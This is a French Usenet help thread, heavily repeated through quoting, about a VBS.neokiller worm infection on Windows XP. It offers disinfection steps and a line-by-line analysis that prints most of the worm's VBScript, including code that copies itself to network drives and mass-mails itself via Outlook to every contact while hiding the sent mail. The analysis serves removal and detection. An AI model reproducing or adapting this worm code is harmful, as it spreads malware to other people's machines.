Tout d'abord je ne suis pas un pro de l'info, donc veuillez pardonner
les grossièretés que je pourrai (que j'ai déjà ??) écrire.
Il semblerait que mon PC (sous XP), soit infecté par le virus (ou ver
...) VBS.neokiller.A, transmis par un cookie "ramassé" il y a deux
jours. C'est en tout cas ce qu'a diagnostiqué BitDefender (d'ailleurs
mis à jour juste avant de chopper ce fameux tueur des temps nouveaux).
J'ai supprimé ce fichier infecté.
Les symptômes :
-Le PC rame complètement, et l'UC (pareil que CPU ?) est chargée à 100%
en permanence (d'après TaskManager)
-Il semblerait qu'un processus cart322.exe (présent dans system32, et
ayant modifié une clé de la base de registres), soit en cause. Lorsque
je le stoppe, il redémarre instantanément ...
-Un certain nombre de processus (5 ou 6) svchost tournent aussi
simultanément et ont l'air de bouffer de la mémoire, mais ceci est
peut-être parfaitement normal ... D'ailleurs, en en supprimant un, j'ai
le droit au fameux message "Autorité NT/RPC" éteignant le PC après une
minute.
Merci de m'aider si vous avez le temps (pliz). J'ai cherché sur pas mal
de sites antivirus sans trouver de solution.
A+
Yohann, désolé pour cette longue news, mais qui a voulu être précis.
Tu peux m'envoyer le .VBS ? J'ai quelques minutes devant moi, je l'analyse fissa.
A+
-- AMcD
http://arnold.mcdonald.free.fr/
joke0
Salut,
Yohann RICO:
Il semblerait que mon PC (sous XP), soit infecté par le virus (ou ver ...) VBS.neokiller.A, transmis par un cookie "ramassé" il y a deux jours.
Un clone de Loveletter...
J'ai supprimé ce fichier infecté.
Problème n°1 réglé.
Les symptômes : -Il semblerait qu'un processus cart322.exe (présent dans system32, et ayant modifié une clé de la base de registres), soit en cause. Lorsque je le stoppe, il redémarre instantanément ...
Problème n°2, probablement un ver exploitant la faille RPC DCOM.
[1 bis- Au cas où il ne trouverait rien, envoie une copie de cart322.exe ici: L'antivirus Kaspersky qui surveille la messagerie te dira de quoi il s'agit.
ou encore (en ligne) Remote Check KAV: http://www.kaspersky.com/remoteviruschk.html ]
2- Fais un tour sur Windows Update et télécharge les patchs qui boucheront les vulnérabilités qu'exploitent ces vers.
3- Ensuite active le firewall de Windows XP (ICF):
Va dans la console des services, panneau de configuration | outils d'administration | services et démarre le service appelé "pare-feu de connexion internet (ICF) / partage de connexion internet (ICS)" et dans les propriétés mets-le en démarrage automatique afin qu'il se mette en route à chaque redémarrage.
4- enfin déconnectes-toi d'internet. Si tu as des partages (pour cause de réseau local par exemple), reconfigure-les (mots de passe solides).
5- Désactiver la restauration système (winME et XP): http://www.lacave.net/~jokeuse/usenet/faq-fcsv.html#a8.5
6- Redémarrer en mode sans échec (touche F8 au tout début du chargement de win), choisir "Safe Mode" ou "Sans Échec",
7- nettoyage avec Stinger (demande un rapport!). Eventuellement aussi avec ton antivirus. S'ils ne trouvent rien, revient ici avec le diagnostic du point 1 bis.
Je pense avoir été complet, n'hésite pas si tu as une question.
-- joke0
Salut,
Yohann RICO:
Il semblerait que mon PC (sous XP), soit infecté par le virus
(ou ver ...) VBS.neokiller.A, transmis par un cookie "ramassé"
il y a deux jours.
Un clone de Loveletter...
J'ai supprimé ce fichier infecté.
Problème n°1 réglé.
Les symptômes :
-Il semblerait qu'un processus cart322.exe (présent dans
system32, et ayant modifié une clé de la base de registres),
soit en cause. Lorsque je le stoppe, il redémarre
instantanément ...
Problème n°2, probablement un ver exploitant la faille RPC DCOM.
[1 bis- Au cas où il ne trouverait rien, envoie une copie de
cart322.exe ici: submit-virus@avp.ch L'antivirus Kaspersky qui
surveille la messagerie te dira de quoi il s'agit.
ou encore (en ligne) Remote Check KAV:
http://www.kaspersky.com/remoteviruschk.html ]
2- Fais un tour sur Windows Update et télécharge les patchs qui
boucheront les vulnérabilités qu'exploitent ces vers.
3- Ensuite active le firewall de Windows XP (ICF):
Va dans la console des services,
panneau de configuration | outils d'administration | services
et démarre le service appelé "pare-feu de connexion internet
(ICF) / partage de connexion internet (ICS)" et dans les
propriétés mets-le en démarrage automatique afin qu'il se
mette en route à chaque redémarrage.
4- enfin déconnectes-toi d'internet. Si tu as des partages (pour
cause de réseau local par exemple), reconfigure-les (mots de
passe solides).
5- Désactiver la restauration système (winME et XP):
http://www.lacave.net/~jokeuse/usenet/faq-fcsv.html#a8.5
6- Redémarrer en mode sans échec (touche F8 au tout début du
chargement de win), choisir "Safe Mode" ou "Sans Échec",
7- nettoyage avec Stinger (demande un rapport!). Eventuellement
aussi avec ton antivirus. S'ils ne trouvent rien, revient ici
avec le diagnostic du point 1 bis.
Je pense avoir été complet, n'hésite pas si tu as une question.
Il semblerait que mon PC (sous XP), soit infecté par le virus (ou ver ...) VBS.neokiller.A, transmis par un cookie "ramassé" il y a deux jours.
Un clone de Loveletter...
J'ai supprimé ce fichier infecté.
Problème n°1 réglé.
Les symptômes : -Il semblerait qu'un processus cart322.exe (présent dans system32, et ayant modifié une clé de la base de registres), soit en cause. Lorsque je le stoppe, il redémarre instantanément ...
Problème n°2, probablement un ver exploitant la faille RPC DCOM.
[1 bis- Au cas où il ne trouverait rien, envoie une copie de cart322.exe ici: L'antivirus Kaspersky qui surveille la messagerie te dira de quoi il s'agit.
ou encore (en ligne) Remote Check KAV: http://www.kaspersky.com/remoteviruschk.html ]
2- Fais un tour sur Windows Update et télécharge les patchs qui boucheront les vulnérabilités qu'exploitent ces vers.
3- Ensuite active le firewall de Windows XP (ICF):
Va dans la console des services, panneau de configuration | outils d'administration | services et démarre le service appelé "pare-feu de connexion internet (ICF) / partage de connexion internet (ICS)" et dans les propriétés mets-le en démarrage automatique afin qu'il se mette en route à chaque redémarrage.
4- enfin déconnectes-toi d'internet. Si tu as des partages (pour cause de réseau local par exemple), reconfigure-les (mots de passe solides).
5- Désactiver la restauration système (winME et XP): http://www.lacave.net/~jokeuse/usenet/faq-fcsv.html#a8.5
6- Redémarrer en mode sans échec (touche F8 au tout début du chargement de win), choisir "Safe Mode" ou "Sans Échec",
7- nettoyage avec Stinger (demande un rapport!). Eventuellement aussi avec ton antivirus. S'ils ne trouvent rien, revient ici avec le diagnostic du point 1 bis.
Je pense avoir été complet, n'hésite pas si tu as une question.
-- joke0
joke0
Salut,
j'écrivais:
VBS.neokiller.A
Un clone de Loveletter...
Plus exactement une bestiole sortie d'un générateur (Constructor.DOS.BioHazard [KAV]). Je ne sais pas si Loveletter est sorti du même générateur :-/
-- joke0
Salut,
j'écrivais:
VBS.neokiller.A
Un clone de Loveletter...
Plus exactement une bestiole sortie d'un générateur
(Constructor.DOS.BioHazard [KAV]). Je ne sais pas si Loveletter
est sorti du même générateur :-/
Plus exactement une bestiole sortie d'un générateur (Constructor.DOS.BioHazard [KAV]). Je ne sais pas si Loveletter est sorti du même générateur :-/
-- joke0
AMcD
Bon, comme je n'ai rien reçu et que mon temps n'est pas extensible, je fais avec ce que j'ai trouvé :o).
Ultra-rapidos-analyse de VBS.neokiller (je ne sais pas si c'est le même que le .A).
' This is The NEOKILLER Worm by ' Generated with the <Bio Hazard Worm Generator> ' on 9/25/01 at 7:47:48 PM
----- On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV ! -----
On Error Resume Next
----- On passe à la ligne suivant celle qui a provoquée l'erreur -----
Dim A01 Dim A02 Dim A03 Dim A04 Dim A08 Dim A06 Dim A07 Dim A05 Dim A09 Dim A10
----- Déclaration des variables -----
Set A01 = CreateObject( "Scripting.FileSystemObject" )
----- Création de l'objet A01 pour manipuler les fichiers -----
----- Dans la clé HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun, création de la valeur NEOKILLER avec la donnée C:WINDOWSsystem32NEOKILLER.VBS. Donc, au démarrage exécution du script NEOKILLER.VBS -----
Set A03 = CreateObject( "WScript.Network" )
----- Création de l'objet A03 pour accéder aux ressources réseau -----
Set A08 = A03.EnumNetworkDrives
----- A08 contient le mappage des lecteurs réseau en cours -----
If A08.Count <> 0 Then
For A04 = 0 To A08.Count - 1
If InStr(A08.Item(A04), "") <> 0 Then A01.CopyFile WScript.ScriptFullName, A01.BuildPath(A08.Item(A04), "NEOKILLER.VBS")
End If
Next
End If
----- Si on a au moins un lecteur réseau, on boucle. Dans la boucle, on copie le script sur chaque lecteur réseau. Heu l'utilité de ce passage m'échappe. Mais bon, je fais ça à 100 à l'heure hein... -----
----- Lecture de la valeur NEOKILLER dans la clé HKEY_LOCAL_MACHINE. Si elle est vide ou supérieur à 20 on va exécuter la payload. C'est donc la trigger. En clair, soit on n'a pas encore infecté et on infecte, soit on n'infecte que toutes les 20 fois -----
If A04 = 0 Then
Set A05 = CreateObject( "Outlook.Application" )
----- Ouverture d'une session Outlook -----
Set A06 = A05.GetNameSpace("MAPI")
----- Objet pour accéder aux objets MAPI du carnet d'adresse -----
For Each A07 In A06.AddressLists
Set A08 = A05.CreateItem(0)
----- Création du mail -----
For A09 = 1 To A07.AddressEntries.Count
Set A10 = A07.AddressEntries(A09)
If A09 = 1 Then
A08.BCC = A10.Address
Else
A08.BCC = A08.BCC & "" & A10.Address
End If
Next
----- Boucle de parcours des adresses. On crée tout simplement l'adresse l'envoi en tenant compte de l'expéditeur -----
A08.Subject = "MVNE"
----- Sujet du mail -----
A08.Body = "WAKE UP NEO!--THE Matrix Has YOU!!!! "
----- Corps du mail -----
A08.Attachmets.Add WScript.ScriptFullName
----- Attachement du script au mail -----
A08.DeleteAfterSubmit = True
----- Le mail ne figurera pas dans la liste des éléments envoyés -----
A08.Send
----- Envoi du mail -----
Next
----- Boucle de parcours des listes d'adresses -----
----- Mise à jour du nombre d'infection dans la BR (le compteur d'infection/trigger) -----
Donc, en gros, du nul de chez nul ! Il te suffit :
1) D'effacer le fichier neokiller.vbs dans le répertoire système. 2) De supprimer la valeur NEOKILLER dans HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun 3) De supprimer la valeur NEOKILLER dans HKEY_LOCAL_MACHINE
A+
-- AMcD
http://arnold.mcdonald.free.fr/
Bon, comme je n'ai rien reçu et que mon temps n'est pas extensible, je fais
avec ce que j'ai trouvé :o).
Ultra-rapidos-analyse de VBS.neokiller (je ne sais pas si c'est le même que
le .A).
' This is The NEOKILLER Worm by W@3
' Generated with the <Bio Hazard Worm Generator>
' on 9/25/01 at 7:47:48 PM
-----
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir
d'un générateur de code automatique. Donc, code minable et. facilement
détectable par un AV !
-----
On Error Resume Next
-----
On passe à la ligne suivant celle qui a provoquée l'erreur
-----
Dim A01
Dim A02
Dim A03
Dim A04
Dim A08
Dim A06
Dim A07
Dim A05
Dim A09
Dim A10
-----
Déclaration des variables
-----
Set A01 = CreateObject( "Scripting.FileSystemObject" )
-----
Création de l'objet A01 pour manipuler les fichiers
-----
-----
Dans la clé
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun, création
de la valeur NEOKILLER avec la donnée C:WINDOWSsystem32NEOKILLER.VBS.
Donc, au démarrage exécution du script NEOKILLER.VBS
-----
Set A03 = CreateObject( "WScript.Network" )
-----
Création de l'objet A03 pour accéder aux ressources réseau
-----
Set A08 = A03.EnumNetworkDrives
-----
A08 contient le mappage des lecteurs réseau en cours
-----
If A08.Count <> 0 Then
For A04 = 0 To A08.Count - 1
If InStr(A08.Item(A04), "") <> 0 Then A01.CopyFile
WScript.ScriptFullName, A01.BuildPath(A08.Item(A04), "NEOKILLER.VBS")
End If
Next
End If
-----
Si on a au moins un lecteur réseau, on boucle. Dans la boucle, on copie le
script sur chaque lecteur réseau. Heu l'utilité de ce passage m'échappe.
Mais bon, je fais ça à 100 à l'heure hein...
-----
-----
Lecture de la valeur NEOKILLER dans la clé HKEY_LOCAL_MACHINE. Si elle est
vide ou supérieur à 20 on va exécuter la payload. C'est donc la trigger. En
clair, soit on n'a pas encore infecté et on infecte, soit on n'infecte que
toutes les 20 fois
-----
If A04 = 0 Then
Set A05 = CreateObject( "Outlook.Application" )
-----
Ouverture d'une session Outlook
-----
Set A06 = A05.GetNameSpace("MAPI")
-----
Objet pour accéder aux objets MAPI du carnet d'adresse
-----
For Each A07 In A06.AddressLists
Set A08 = A05.CreateItem(0)
-----
Création du mail
-----
For A09 = 1 To A07.AddressEntries.Count
Set A10 = A07.AddressEntries(A09)
If A09 = 1 Then
A08.BCC = A10.Address
Else
A08.BCC = A08.BCC & "" & A10.Address
End If
Next
-----
Boucle de parcours des adresses. On crée tout simplement l'adresse l'envoi
en tenant compte de l'expéditeur
-----
A08.Subject = "MVNE"
-----
Sujet du mail
-----
A08.Body = "WAKE UP NEO!--THE Matrix Has YOU!!!! "
-----
Corps du mail
-----
A08.Attachmets.Add WScript.ScriptFullName
-----
Attachement du script au mail
-----
A08.DeleteAfterSubmit = True
-----
Le mail ne figurera pas dans la liste des éléments envoyés
-----
A08.Send
-----
Envoi du mail
-----
Next
-----
Boucle de parcours des listes d'adresses
-----
-----
Mise à jour du nombre d'infection dans la BR (le compteur
d'infection/trigger)
-----
Donc, en gros, du nul de chez nul ! Il te suffit :
1) D'effacer le fichier neokiller.vbs dans le répertoire système.
2) De supprimer la valeur NEOKILLER dans
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
3) De supprimer la valeur NEOKILLER dans HKEY_LOCAL_MACHINE
Bon, comme je n'ai rien reçu et que mon temps n'est pas extensible, je fais avec ce que j'ai trouvé :o).
Ultra-rapidos-analyse de VBS.neokiller (je ne sais pas si c'est le même que le .A).
' This is The NEOKILLER Worm by ' Generated with the <Bio Hazard Worm Generator> ' on 9/25/01 at 7:47:48 PM
----- On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV ! -----
On Error Resume Next
----- On passe à la ligne suivant celle qui a provoquée l'erreur -----
Dim A01 Dim A02 Dim A03 Dim A04 Dim A08 Dim A06 Dim A07 Dim A05 Dim A09 Dim A10
----- Déclaration des variables -----
Set A01 = CreateObject( "Scripting.FileSystemObject" )
----- Création de l'objet A01 pour manipuler les fichiers -----
----- Dans la clé HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun, création de la valeur NEOKILLER avec la donnée C:WINDOWSsystem32NEOKILLER.VBS. Donc, au démarrage exécution du script NEOKILLER.VBS -----
Set A03 = CreateObject( "WScript.Network" )
----- Création de l'objet A03 pour accéder aux ressources réseau -----
Set A08 = A03.EnumNetworkDrives
----- A08 contient le mappage des lecteurs réseau en cours -----
If A08.Count <> 0 Then
For A04 = 0 To A08.Count - 1
If InStr(A08.Item(A04), "") <> 0 Then A01.CopyFile WScript.ScriptFullName, A01.BuildPath(A08.Item(A04), "NEOKILLER.VBS")
End If
Next
End If
----- Si on a au moins un lecteur réseau, on boucle. Dans la boucle, on copie le script sur chaque lecteur réseau. Heu l'utilité de ce passage m'échappe. Mais bon, je fais ça à 100 à l'heure hein... -----
----- Lecture de la valeur NEOKILLER dans la clé HKEY_LOCAL_MACHINE. Si elle est vide ou supérieur à 20 on va exécuter la payload. C'est donc la trigger. En clair, soit on n'a pas encore infecté et on infecte, soit on n'infecte que toutes les 20 fois -----
If A04 = 0 Then
Set A05 = CreateObject( "Outlook.Application" )
----- Ouverture d'une session Outlook -----
Set A06 = A05.GetNameSpace("MAPI")
----- Objet pour accéder aux objets MAPI du carnet d'adresse -----
For Each A07 In A06.AddressLists
Set A08 = A05.CreateItem(0)
----- Création du mail -----
For A09 = 1 To A07.AddressEntries.Count
Set A10 = A07.AddressEntries(A09)
If A09 = 1 Then
A08.BCC = A10.Address
Else
A08.BCC = A08.BCC & "" & A10.Address
End If
Next
----- Boucle de parcours des adresses. On crée tout simplement l'adresse l'envoi en tenant compte de l'expéditeur -----
A08.Subject = "MVNE"
----- Sujet du mail -----
A08.Body = "WAKE UP NEO!--THE Matrix Has YOU!!!! "
----- Corps du mail -----
A08.Attachmets.Add WScript.ScriptFullName
----- Attachement du script au mail -----
A08.DeleteAfterSubmit = True
----- Le mail ne figurera pas dans la liste des éléments envoyés -----
A08.Send
----- Envoi du mail -----
Next
----- Boucle de parcours des listes d'adresses -----
----- Mise à jour du nombre d'infection dans la BR (le compteur d'infection/trigger) -----
Donc, en gros, du nul de chez nul ! Il te suffit :
1) D'effacer le fichier neokiller.vbs dans le répertoire système. 2) De supprimer la valeur NEOKILLER dans HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun 3) De supprimer la valeur NEOKILLER dans HKEY_LOCAL_MACHINE
A+
-- AMcD
http://arnold.mcdonald.free.fr/
Frederic Bonroy
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire soi-même un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir
d'un générateur de code automatique. Donc, code minable et. facilement
détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire soi-même
un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies
le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire soi-même un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
djehuti
salut "Frederic Bonroy" a écrit dans le message news: bpvoom$1sl187$
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire soi-même un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
au contraire, c'est une très bonne idée... et ça te sera très utile pour la conception de l'AV libre que tu vas nous écrire :-)
@tchao
salut
"Frederic Bonroy" <bidonavirus@yahoo.fr> a écrit dans le message news:
bpvoom$1sl187$1@ID-75150.news.uni-berlin.de
On voit d'entrée que ce sera un code de piètre qualité puisque créé
à partir d'un générateur de code automatique. Donc, code minable et.
facilement détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire
soi-même
un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies
le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
au contraire, c'est une très bonne idée... et ça te sera très utile pour la
conception de l'AV libre que tu vas nous écrire :-)
salut "Frederic Bonroy" a écrit dans le message news: bpvoom$1sl187$
On voit d'entrée que ce sera un code de piètre qualité puisque créé à partir d'un générateur de code automatique. Donc, code minable et. facilement détectable par un AV !
Ça me donne une petite idée - il devrait être possible d'écrire soi-même un petit programme qui détecte ce virus. Ça te dirait? Si tu m'envoies le virus je vais tenter de mon côté (sans garantie de succès).
(Ça n'aurait aucune utilité bien sûr, mais pour rigoler?)
au contraire, c'est une très bonne idée... et ça te sera très utile pour la conception de l'AV libre que tu vas nous écrire :-)
@tchao
Frederic Bonroy
au contraire, c'est une très bonne idée... et ça te sera très utile pour la conception de l'AV libre que tu vas nous écrire :-)
En tout cas pour toi il sera payant. ;-)
au contraire, c'est une très bonne idée... et ça te sera très utile pour la
conception de l'AV libre que tu vas nous écrire :-)
